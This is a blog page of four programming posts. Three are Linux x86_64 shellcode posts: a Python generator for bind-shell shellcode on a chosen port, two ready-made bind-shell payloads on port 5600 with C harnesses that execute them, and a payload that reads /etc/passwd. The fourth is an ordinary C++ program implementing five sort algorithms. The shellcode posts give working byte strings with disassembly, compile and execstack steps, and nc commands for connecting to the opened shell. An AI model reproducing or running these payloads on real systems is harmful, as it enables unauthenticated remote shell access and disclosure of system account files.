
Saturday 23 April 2016

Ajith KP

Linux x64 - Bind Shell shellcode Generator

Hi GuyZ,
     This is another shellcode generator by _TERMINAL_CODERS_. This Python program generates the bind shell shellcode for a desired port. The port number must be between 501 and 9997.


Source Code

#!/bin/python
import socket
import sys 
"""

Linux x64 - Bind Shell shellcode Generator

---------------------------------------------------------------------------------

Disassemby of bindshell - port 5600

Disassembly of section .text:0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 f6              xor    %rsi,%rsi
  400086: 99                    cltd   
  400087: 6a 29                 pushq  $0x29
  400089: 58                    pop    %rax
  40008a: ff c6                 inc    %esi
  40008c: 6a 02                 pushq  $0x2
  40008e: 5f                    pop    %rdi
  40008f: 0f 05                 syscall 
  400091: 48 97                 xchg   %rax,%rdi
  400093: 6a 02                 pushq  $0x2
  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp) ;;;; 0xe015 - Port of 5600
  40009c: 54                    push   %rsp
  40009d: 5e                    pop    %rsi
  40009e: 52                    push   %rdx
  40009f: 6a 10                 pushq  $0x10
  4000a1: 5a                    pop    %rdx
  4000a2: 6a 31                 pushq  $0x31
  4000a4: 58                    pop    %rax
  4000a5: 0f 05                 syscall 
  4000a7: 50                    push   %rax
  4000a8: 5e                    pop    %rsi
  4000a9: 6a 32                 pushq  $0x32
  4000ab: 58                    pop    %rax
  4000ac: 0f 05                 syscall 
  4000ae: 6a 2b                 pushq  $0x2b
  4000b0: 58                    pop    %rax
  4000b1: 0f 05                 syscall 
  4000b3: 48 97                 xchg   %rax,%rdi
  4000b5: 6a 03                 pushq  $0x3
  4000b7: 5e                    pop    %rsi
  4000b8: ff ce                 dec    %esi
  4000ba: b0 21                 mov    $0x21,%al
  4000bc: 0f 05                 syscall 
  4000be: 75 f8                 jne    0x4000b8
  4000c0: 48 31 c0              xor    %rax,%rax
  4000c3: 99                    cltd   
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 54                    push   %rsp
  4000d0: 5f                    pop    %rdi
  4000d1: 6a 3b                 pushq  $0x3b
  4000d3: 58                    pop    %rax
  4000d4: 0f 05                 syscall
 ---------------------------------------------------------------------------------
 b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
 
 Om Asato Maa Sad-Gamaya |
 Tamaso Maa Jyotir-Gamaya |
 Mrtyor-Maa Amrtam Gamaya |
 Om Shaantih Shaantih Shaantih |
"""
# Banner text; it is printed on every run, before the arguments are inspected.
bann3r = '''
 [][][][][][][][][][][][][][][][][][][][][][][]
 []                                          []
 []      c0d3d by Ajith Kp [ajithkp560]      []
 []   http://www.terminalcoders.blogspot.in  []
 []                                          []
 [][][][][][][][][][][][][][][][][][][][][][][]
'''
print bann3r
# Help text for a wrong argument count. The 501-9997 range is only described
# here; no statement below checks the value against it.
usage = "Usage: "+sys.argv[0]+" <port number (501<= port <= 9997)>"
example = "Example: "+sys.argv[0]+" 5600"
# code1 and code2 are the fixed parts of the payload, stored as escaped text
# ("\\x48" is the four characters \x48) so the result can be pasted into a C
# string literal. Read against the disassembly in the header string, code1 ends
# with the opcode bytes 66 c7 44 24 02 of `movw $imm16,0x2(%rsp)`; the two port
# bytes inserted between code1 and code2 are that instruction's operand.
code1 = "\\x48\\x31\\xc0\\x48\\x31\\xf6\\x99\\x6a\\x29\\x58\\xff\\xc6\\x6a\\x02\\x5f\\x0f\\x05\\x48\\x97\\x6a\\x02\\x66\\xc7\\x44\\x24\\x02"
# code2 resumes at `push %rsp` and runs through the final syscall of the listing.
code2 = "\\x54\\x5e\\x52\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x50\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x6a\\x2b\\x58\\x0f\\x05\\x48\\x97\\x6a\\x03\\x5e\\xff\\xce\\xb0\\x21\\x0f\\x05\\x75\\xf8\\x48\\x31\\xc0\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05"
if len(sys.argv)!=2:
 # Anything other than exactly one argument: print the help text and stop.
 print usage
 print example
else:
 # Port operand: int(argv[1]) -> socket.htons() -> hex digits without "0x" ->
 # grouped into two-character pairs -> pair order reversed -> joined with "\x".
 # For 5600 the header listing shows the resulting byte pair as 15 e0.
 # NOTE(review): argv[1] is used unvalidated. int() raises ValueError on a
 # non-numeric value, the documented range is not enforced, and the pairing
 # looks like it assumes hex() yields exactly four digits - confirm.
 # NOTE(review): htons() depends on the byte order of the machine running
 # this script, not of the machine the output is built for.
 port = "\\x"+("\\x").join([''.join(x) for x in zip(*[list(str(hex(socket.htons(int(sys.argv[1])))[2:])[z::2]) for z in range(2)])][::-1])#str(hex(socket.htons(int(sys.argv[1])))[2:])
 sh311code = code1 + port + code2
 # Everything from here on is printed as the text of a C source file.
 # NOTE(review): the "Port =" label prints sys.argv[0] (the script path), not
 # the port given in sys.argv[1], and the "./output" line is printed twice.
 print '// Port = '+sys.argv[0]+' --- (501<= port <= 9997)'
 print '// Compile with'
 print '// $ gcc -o output source.c'
 # The printed steps rely on execstack -s; the emitted program calls into a
 # data array, which memory protections (NX) normally refuse to execute.
 print '// $ execstack -s output'
 print '// $ ./output'
 print '// $ ./output'
 print '////////////////////////////////////////////\n'
 print '# include <stdio.h>'
 print 'char sh[] = "'+sh311code+'";'
 print 'main(int argc, char **argv)'
 # Body of the emitted main(): cast the sh array to a function pointer and call it.
 print '''{
            int (*func)();
            func = (int (*)()) sh;
            (int)(*func)();'''
 print '}'
 print '\n////////////////////////////////////////////'
Ajith KP

Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes

Hi guyZ,
     This is another shellcode developed by _TERMINAL_CODERS_. The shellcode binds to port 5600 and executes the commands it receives from the hacker.


Source Code

/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 f6              xor    %rsi,%rsi
  400086: 99                    cltd   
  400087: 6a 29                 pushq  $0x29
  400089: 58                    pop    %rax
  40008a: ff c6                 inc    %esi
  40008c: 6a 02                 pushq  $0x2
  40008e: 5f                    pop    %rdi
  40008f: 0f 05                 syscall 
  400091: 48 97                 xchg   %rax,%rdi
  400093: 6a 02                 pushq  $0x2
  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
  40009c: 54                    push   %rsp
  40009d: 5e                    pop    %rsi
  40009e: 52                    push   %rdx
  40009f: 6a 10                 pushq  $0x10
  4000a1: 5a                    pop    %rdx
  4000a2: 6a 31                 pushq  $0x31
  4000a4: 58                    pop    %rax
  4000a5: 0f 05                 syscall 
  4000a7: 50                    push   %rax
  4000a8: 5e                    pop    %rsi
  4000a9: 6a 32                 pushq  $0x32
  4000ab: 58                    pop    %rax
  4000ac: 0f 05                 syscall 
  4000ae: 6a 2b                 pushq  $0x2b
  4000b0: 58                    pop    %rax
  4000b1: 0f 05                 syscall 
  4000b3: 48 97                 xchg   %rax,%rdi
  4000b5: 6a 03                 pushq  $0x3
  4000b7: 5e                    pop    %rsi
  4000b8: ff ce                 dec    %esi
  4000ba: b0 21                 mov    $0x21,%al
  4000bc: 0f 05                 syscall 
  4000be: 75 f8                 jne    0x4000b8
  4000c0: 48 31 c0              xor    %rax,%rax
  4000c3: 99                    cltd   
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 54                    push   %rsp
  4000d0: 5f                    pop    %rdi
  4000d1: 6a 3b                 pushq  $0x3b
  4000d3: 58                    pop    %rax
  4000d4: 0f 05                 syscall
 
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
 
How to Connect
 
$ nc <HOST IP ADDRESS> 5600
 
Eg:
 
$ nc 127.0.0.1 5600
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * Payload bytes for the listing in the header comment. Read against that
 * listing, the values loaded into rax before each syscall are 0x29 (socket),
 * 0x31 (bind), 0x32 (listen), 0x2b (accept), 0x21 (dup2, looped over
 * descriptors 2, 1, 0) and 0x3b (execve of the string "/bin//sh").
 * The port operand is the byte pair 15 e0 (5600). The address bytes of the
 * sockaddr are left zero, so the listener is not tied to one interface, and
 * nothing in the sequence authenticates the peer.
 * For defenders: the observable artefacts are an unexpected TCP listener on
 * 5600 and a /bin/sh process whose standard descriptors are a socket.
 */
char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
/*
 * Test harness: treats the data array as code by casting it to a function
 * pointer and calling it. The header's run steps include `execstack -s`
 * because data memory is normally not executable (NX); without that step the
 * call is expected to fault.
 * NOTE(review): `void main` is non-standard, and argc/argv are unused.
 */
void main(int argc, char **argv)
{
    int (*func)();
    /* Reinterpret the byte array as a function taking no declared arguments. */
    func = (int (*)()) sh;
    /* Jump into the array; the return value is cast and discarded. */
    (int)(*func)();
}

Wednesday 20 April 2016

Ajith KP

Sort Algorithms: Quick Sort, Merge Sort, Radix Sort, Heap Sort and Shell Sort in One Program

Hi GuyZ,
     This source code contains implementations of the Quick Sort, Merge Sort, Radix Sort, Heap Sort and Shell Sort algorithms.


Source Code

#include <iostream>
#include <queue>
#include <cmath>
using namespace std;
// Shared output helper that every sorter class below inherits.
class Show{
public:
    // Writes the label "Sorted List: " and then the first n elements of arr,
    // each followed by one space, and ends the line with a flush.
    void show(int *arr, int n){
        cout<<"Sorted List: ";
        int idx = 0;
        while(idx<n){
            cout<<arr[idx];
            cout<<" ";
            ++idx;
        }
        cout<<endl;
    }
};

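// Merge sort over a fixed-size buffer, driven interactively from cin.
class merge:public Show{
    // Capacity of the fixed buffers; read() rejects any count outside 0..MAX_ITEMS.
    enum { MAX_ITEMS = 1024 };
    int a[MAX_ITEMS], sort[MAX_ITEMS], n, i, j, k;

    // Recursively sorts a[beg..end] (inclusive) by splitting at the midpoint.
    void divide(int beg, int end){
        if((end-beg)>=1){
            int mid = (beg+end)/2;
            divide(beg, mid);
            divide(mid+1, end);
            arrange(beg, mid, end);
        }
    }
    // Merges the sorted runs a[beg..mid] and a[mid+1..end] through the scratch
    // buffer `sort`, then copies the merged range back into a.
    void arrange(int beg, int mid, int end){
        i=k=beg;
        j=mid+1;
        while(i<=mid && j<=end){
            if(a[i]<a[j]){
                sort[k++]=a[i++];
            }
            else{
                sort[k++]=a[j++];
            }
        }
        while(i<=mid){
            sort[k++]=a[i++];
        }
        while(j<=end){
            sort[k++]=a[j++];
        }
        for(i=beg;i<=end;i++){
            a[i]=sort[i];
        }
    }
    // Clears a failed stream state and drops the rest of the offending line.
    void discardBadInput(){
        cin.clear();
        cin.ignore(1024, '\n');
        n = 0;
    }
public:
    // Reads an item count and that many integers, sorts them, prints the result.
    // The count comes straight from user input, so it is checked against the
    // buffer capacity before any element is stored; previously a count above
    // 1024 wrote past the end of a[] and sort[].
    void read(){
        cout<<"Enter limit: ";
        if(!(cin>>n) || n<0 || n>MAX_ITEMS){
            cout<<"Invalid limit: expected a number from 0 to "<<MAX_ITEMS<<endl;
            discardBadInput();
            return;
        }
        cout<<"Enter "<<n<<" items: ";
        for(i=0;i<n;i++){
            if(!(cin>>a[i])){
                cout<<"Invalid item: expected an integer"<<endl;
                discardBadInput();
                return;
            }
        }
        divide(0, n-1);
        show(a, n);
    }
};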

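// Heap-based sort over a fixed-size buffer, driven interactively from cin.
class heapsort:public Show{
    // Capacity of arr; read() rejects any count outside 0..MAX_ITEMS.
    enum { MAX_ITEMS = 1024 };
    // tarr is used as a 1-based heap (slot 0 unused), so it needs one more
    // slot than arr; with equal sizes a full buffer wrote past its end.
    int n, arr[MAX_ITEMS], tarr[MAX_ITEMS+1];

    // Builds a max-heap in tarr[1..n] from arr[0..n-1], copies the non-root
    // heap slots back to arr[0..n-2] and returns the maximum. Requires n >= 1.
    int buildTree(int n){
        tarr[1] = arr[0];
        for(int next=2;next<=n;next++){
            tarr[next] = arr[next-1];
            // Sift the new element up until its parent is not smaller. The
            // bound is tested first so tarr[0] is never read, and the child
            // index follows the element upwards; the earlier version stopped
            // after a single swap and could leave the maximum below the root.
            int child = next;
            int parent = child/2;
            while(parent>0 && tarr[parent]<tarr[child]){
                int t = tarr[parent];
                tarr[parent] = tarr[child];
                tarr[child] = t;
                child = parent;
                parent = child/2;
            }
        }
        int j = 0;
        for(int i=2;i<n+1;i++){
            arr[j++] = tarr[i];
        }
        return tarr[1];
    }
    // Clears a failed stream state and drops the rest of the offending line.
    void discardBadInput(){
        cin.clear();
        cin.ignore(1024, '\n');
        n = 0;
    }
public:
    // Reads an item count and that many integers, sorts them ascending by
    // repeatedly moving the maximum of the unsorted prefix to its end, and
    // prints the result. The user-supplied count is validated before use.
    void read(){
        cout<<"Enter the limit: ";
        if(!(cin>>n) || n<0 || n>MAX_ITEMS){
            cout<<"Invalid limit: expected a number from 0 to "<<MAX_ITEMS<<endl;
            discardBadInput();
            return;
        }
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++){
            if(!(cin>>arr[i])){
                cout<<"Invalid item: expected an integer"<<endl;
                discardBadInput();
                return;
            }
        }
        int t = n;
        while(t){
            arr[t-1] = buildTree(t);
            t--;
        }
        show(arr, n);
    }
};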

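// Quick sort over a fixed-size buffer, driven interactively from cin.
class quick:public Show{
    // Capacity of the buffer; read() rejects any count outside 0..MAX_ITEMS.
    enum { MAX_ITEMS = 1024 };
    int a[MAX_ITEMS], n;

    // Recursively sorts a[beg..end] (inclusive) around a partition point.
    void quickSort(int *a, int beg, int end){
        if(beg<end){
            int pivot = partition(a, beg, end);
            quickSort(a, beg, pivot-1);
            quickSort(a, pivot+1, end);
        }
    }
    // Partitions a[beg..end] around the value a[beg] and returns the index
    // where that pivot value ends up. Scan state is kept in locals rather than
    // in class members shared across recursive calls.
    int partition(int *a, int beg, int end){
        int pivot = a[beg];
        int lo = beg+1;
        int hi = end;
        bool done = false;
        while(!done){
            while(lo<=hi && a[lo]<=pivot){
                lo++;
            }
            while(hi>=lo && a[hi]>=pivot){
                hi--;
            }
            if(hi<lo){
                done = true;
            }
            else {
                int t = a[lo];
                a[lo] = a[hi];
                a[hi] = t;
            }
        }
        // Drop the pivot into the gap between the two partitions.
        int t = a[beg];
        a[beg] = a[hi];
        a[hi] = t;
        return hi;
    }
    // Clears a failed stream state and drops the rest of the offending line.
    void discardBadInput(){
        cin.clear();
        cin.ignore(1024, '\n');
        n = 0;
    }
public:
    // Reads an item count and that many integers, sorts them, prints the result.
    // The count comes straight from user input, so it is checked against the
    // buffer capacity before any element is stored; previously a count above
    // 1024 wrote past the end of a[].
    void read(){
        cout<<"Enter limit: ";
        if(!(cin>>n) || n<0 || n>MAX_ITEMS){
            cout<<"Invalid limit: expected a number from 0 to "<<MAX_ITEMS<<endl;
            discardBadInput();
            return;
        }
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++){
            if(!(cin>>a[i])){
                cout<<"Invalid item: expected an integer"<<endl;
                discardBadInput();
                return;
            }
        }
        quickSort(a, 0, n-1);
        show(a, n);
    }
};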

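// Shell sort over a fixed-size buffer, driven interactively from cin.
class shellsort:public Show{
    // Capacity of the buffer; read() rejects any count outside 0..MAX_ITEMS.
    enum { MAX_ITEMS = 1024 };
    int n, arr[MAX_ITEMS];

    // Gapped insertion sort of one chain: the elements at start, start+x,
    // start+2x, ... below index l. Stepping by x keeps each call on its own
    // chain; stepping by 1 made every call after the first repeat work that
    // the call for start 0 had already done.
    void arrange(int *arr, int start, int x, int l){
        for(int i=start+x;i<l;i+=x){
            int val = arr[i];
            int pos = i;
            while(pos>=x && arr[pos-x]>val){
                arr[pos] = arr[pos-x];
                pos = pos-x;
            }
            arr[pos] = val;
        }
    }
    // Runs gapped passes with the gap halving from l/2 down to 1.
    void shells(int *arr, int l){
        int gap = l/2;
        while(gap>0){
            for(int i=0;i<gap;i++){
                arrange(arr, i, gap, l);
            }
            gap=gap/2;
        }
    }
    // Clears a failed stream state and drops the rest of the offending line.
    void discardBadInput(){
        cin.clear();
        cin.ignore(1024, '\n');
        n = 0;
    }
public:
    // Reads an item count and that many integers, sorts them, prints the result.
    // The count comes straight from user input, so it is checked against the
    // buffer capacity before any element is stored; previously a count above
    // 1024 wrote past the end of arr[].
    void read(){
        cout<<"Enter limit: ";
        if(!(cin>>n) || n<0 || n>MAX_ITEMS){
            cout<<"Invalid limit: expected a number from 0 to "<<MAX_ITEMS<<endl;
            discardBadInput();
            return;
        }
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++){
            if(!(cin>>arr[i])){
                cout<<"Invalid item: expected an integer"<<endl;
                discardBadInput();
                return;
            }
        }
        shells(arr, n);
        show(arr, n);
    }
};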

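// LSD radix sort (base 10) over a fixed-size buffer, driven from cin.
class radix:public Show{
    // Capacity of the buffer; read() rejects any count outside 0..MAX_ITEMS.
    enum { MAX_ITEMS = 1024 };
    int arr[MAX_ITEMS], n;

    // Clears a failed stream state and drops the rest of the offending line.
    void discardBadInput(){
        cin.clear();
        cin.ignore(1024, '\n');
        n = 0;
    }
public:
    // Reads an item count and that many integers, sorts them ascending and
    // prints the result. The user-supplied count is validated before any
    // element is stored; previously a count above 1024 overflowed arr[].
    void read(){
        cout<<"Enter limit: ";
        if(!(cin>>n) || n<0 || n>MAX_ITEMS){
            cout<<"Invalid limit: expected a number from 0 to "<<MAX_ITEMS<<endl;
            discardBadInput();
            return;
        }
        cout<<"Enter "<<n<<" items: ";
        for(int i=0;i<n;i++){
            if(!(cin>>arr[i])){
                cout<<"Invalid item: expected an integer"<<endl;
                discardBadInput();
                return;
            }
        }
        bool morePasses = true;
        // 64-bit divisor and magnitude: the last `d*10` and the absolute value
        // of the most negative int both overflow a 32-bit int.
        long long d = 1;
        while(morePasses){
            morePasses = false;
            queue<int> Q[10];   // non-negative values, bucketed by current digit
            queue<int> QN[10];  // negative values, bucketed by current digit
            for(int i=0;i<n;i++){
                long long mag = arr[i];
                if(mag<0){
                    mag = -mag;
                }
                long long shifted = mag/d;
                if(shifted>9){
                    morePasses = true;  // a higher digit remains for some value
                }
                if(arr[i]<0)
                    QN[shifted%10].push(arr[i]);
                else
                    Q[shifted%10].push(arr[i]);
            }
            int t = 0;
            // Negatives first, largest digit first, so that larger magnitudes
            // (smaller values) come out earlier.
            for(int i=9;i>=0;i--){
                while(!QN[i].empty()){
                    arr[t++] = QN[i].front();
                    QN[i].pop();
                }
            }
            for(int i=0;i<10;i++){
                while(!Q[i].empty()){
                    arr[t++] = Q[i].front();
                    Q[i].pop();
                }
            }
            d = d*10;
        }
        show(arr, n);
    }
};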
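// Interactive menu that dispatches to one of the five sorter objects.
class menu{
    int opt;
    heapsort hs;
    shellsort ss;
    radix r;
    quick q;
    merge m;
public:
    // Prints the menu once, then reads options until 6 (Exit) is chosen or the
    // input ends. A failed read is handled explicitly: previously non-numeric
    // input or end of input left cin in a failed state and the loop spun
    // forever printing the error message.
    void read(){
        opt = 0;
        cout<<"\n\t\t\tMENU\n1. Heap Sort\n2. Shell Sort\n3. Radix Sort\n4. Quick Sort\n5. Merge Sort\n6. Exit";
        while(opt!=6){
            cout<<"\nOption: ";
            if(!(cin>>opt)){
                if(cin.eof()){
                    break;  // input closed: nothing more can be read
                }
                // Non-numeric input: reset the stream and drop the bad line.
                cin.clear();
                cin.ignore(1024, '\n');
                opt = 0;
                cout<<"Option Error: Try again...";
                continue;
            }
            switch(opt){
                case 1:
                    hs.read();
                    break;
                case 2:
                    ss.read();
                    break;
                case 3:
                    r.read();
                    break;
                case 4:
                    q.read();
                    break;
                case 5:
                    m.read();
                    break;
                case 6:
                    break;
                default:
                    cout<<"Option Error: Try again...";
                    break;
            }
        }
    }
};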
// Program entry point: hands control to the interactive sort menu.
int main()
{
    menu sorter;
    sorter.read();
    return 0;
}

Friday 15 April 2016

Ajith KP

Linux/x86_64 - Read /etc/passwd - 65 bytes

Hi GuyZ,
     This is another shellcode shared by _TERMINAL_CODERS_.



Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - Read /etc/passwd - 65 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 2f                 jmp    0x4000b1
  400082: 5f                    pop    rdi
  400083: 6a 02                 push   0x2
  400085: 58                    pop    rax
  400086: 48 31 f6              xor    rsi,rsi
  400089: 0f 05                 syscall 
  40008b: 66 81 ec ef 0f        sub    sp,0xfef
  400090: 48 8d 34 24           lea    rsi,[rsp]
  400094: 48 97                 xchg   rdi,rax
  400096: 48 31 d2              xor    rdx,rdx
  400099: 66 ba ef 0f           mov    dx,0xfef
  40009d: 48 31 c0              xor    rax,rax
  4000a0: 0f 05                 syscall 
  4000a2: 6a 01                 push   0x1
  4000a4: 5f                    pop    rdi
  4000a5: 48 92                 xchg   rdx,rax
  4000a7: 6a 01                 push   0x1
  4000a9: 58                    pop    rax
  4000aa: 0f 05                 syscall 
  4000ac: 6a 3c                 push   0x3c
  4000ae: 58                    pop    rax
  4000af: 0f 05                 syscall 
  4000b1: e8 cc ff ff ff        call   0x400082
  4000b6: 2f                    (bad)  
  4000b7: 65 74 63              gs je  0x40011d
  4000ba: 2f                    (bad)  
  4000bb: 70 61                 jo     0x40011e
  4000bd: 73 73                 jae    0x400132
  4000bf: 77 64                 ja     0x400125

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * Payload bytes for the listing in the header comment. Read against that
 * listing: the leading jmp and the call at the end are used to obtain the
 * address of the bytes that follow the call, which are the ASCII text
 * "/etc/passwd" (the disassembler decodes them as the "(bad)"/je/jo lines).
 * The values loaded into rax before each syscall are 0x2 (open, with rsi
 * zeroed), 0 (read of up to 0xfef bytes into space reserved on the stack),
 * 0x1 (write to descriptor 1) and 0x3c (exit).
 * The path has no terminator inside the payload itself; in this file the C
 * string literal supplies the trailing NUL.
 */
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
/*
 * Test harness: treats the data array as code by casting it to a function
 * pointer and calling it. The header's run steps include `execstack -s`
 * because data memory is normally not executable (NX); without that step the
 * call is expected to fault.
 * NOTE(review): `void main` is non-standard, and argc/argv are unused.
 */
void main(int argc, char **argv)
{
 int (*func)();
 /* Reinterpret the byte array as a function taking no declared arguments. */
 func = (int (*)()) sh;
 /* Jump into the array; the return value is cast and discarded. */
 (int)(*func)();
}

Monday 11 April 2016

Ajith KP

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes

Hi GuyZ,
     This is another shellcode by _TERMINAL_CODERS_. You can find it here: https://www.exploit-db.com/exploits/39684/


Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080:   99                      cdq    
  400081:   6a 29                   push   0x29
  400083:   58                      pop    rax
  400084:   6a 01                   push   0x1
  400086:   5e                      pop    rsi
  400087:   6a 02                   push   0x2
  400089:   5f                      pop    rdi
  40008a:   0f 05                   syscall 
  40008c:   48 97                   xchg   rdi,rax
  40008e:   6a 02                   push   0x2
  400090:   66 c7 44 24 02 15 e0    mov    WORD PTR [rsp+0x2],0xe015
  400097:   54                      push   rsp
  400098:   5e                      pop    rsi
  400099:   52                      push   rdx
  40009a:   6a 10                   push   0x10
  40009c:   5a                      pop    rdx
  40009d:   6a 31                   push   0x31
  40009f:   58                      pop    rax
  4000a0:   0f 05                   syscall 
  4000a2:   50                      push   rax
  4000a3:   5e                      pop    rsi
  4000a4:   6a 32                   push   0x32
  4000a6:   58                      pop    rax
  4000a7:   0f 05                   syscall 
  4000a9:   6a 2b                   push   0x2b
  4000ab:   58                      pop    rax
  4000ac:   0f 05                   syscall 
  4000ae:   48 97                   xchg   rdi,rax
  4000b0:   6a 03                   push   0x3
  4000b2:   5e                      pop    rsi
  4000b3:   48 ff ce                dec    rsi
  4000b6:   6a 21                   push   0x21
  4000b8:   58                      pop    rax
  4000b9:   0f 05                   syscall 
  4000bb:   75 f6                   jne    0x4000b3
  4000bd:   99                      cdq    
  4000be:   52                      push   rdx
  4000bf:   48 b9 2f 62 69 6e 2f    movabs rcx,0x68732f2f6e69622f
  4000c6:   2f 73 68 
  4000c9:   51                      push   rcx
  4000ca:   54                      push   rsp
  4000cb:   5f                      pop    rdi
  4000cc:   6a 3b                   push   0x3b
  4000ce:   58                      pop    rax
  4000cf:   0f 05                   syscall 

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell

How to Connect

$ nc <HOST IP ADDRESS> 5600

Eg:

$ nc 127.0.0.1 5600

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
/*
 * Payload bytes for the listing in the header comment. Read against that
 * listing, the values loaded into rax before each syscall are 0x29 (socket),
 * 0x31 (bind), 0x32 (listen), 0x2b (accept), 0x21 (dup2, looped over
 * descriptors 2, 1, 0) and 0x3b (execve of the string "/bin//sh").
 * The port operand is the byte pair 15 e0 (5600). The address bytes of the
 * sockaddr are left zero, so the listener is not tied to one interface, and
 * nothing in the sequence authenticates the peer.
 * For defenders: the observable artefacts are an unexpected TCP listener on
 * 5600 and a /bin/sh process whose standard descriptors are a socket.
 */
char sh[]="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05";
/*
 * Test harness: treats the data array as code by casting it to a function
 * pointer and calling it. The header's run steps include `execstack -s`
 * because data memory is normally not executable (NX); without that step the
 * call is expected to fault.
 * NOTE(review): `void main` is non-standard, and argc/argv are unused.
 */
void main(int argc, char **argv)
{
 int (*func)();
 /* Reinterpret the byte array as a function taking no declared arguments. */
 func = (int (*)()) sh;
 /* Jump into the array; the return value is cast and discarded. */
 (int)(*func)();
}